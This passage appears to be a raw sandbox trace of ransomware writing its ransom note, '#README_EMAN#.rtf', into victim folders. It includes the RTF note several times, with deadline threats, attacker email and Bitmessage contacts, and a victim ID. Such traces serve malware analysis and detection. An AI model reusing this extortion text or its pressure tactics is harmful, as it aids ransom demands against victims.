decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.155] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.155] CloseHandle (hObject=0x2ec) returned 1 [0291.156] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\#readme_eman#.rtf")) returned 0xffffffff [0291.156] GetLastError () returned 0x2 [0291.156] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.157] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.157] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a 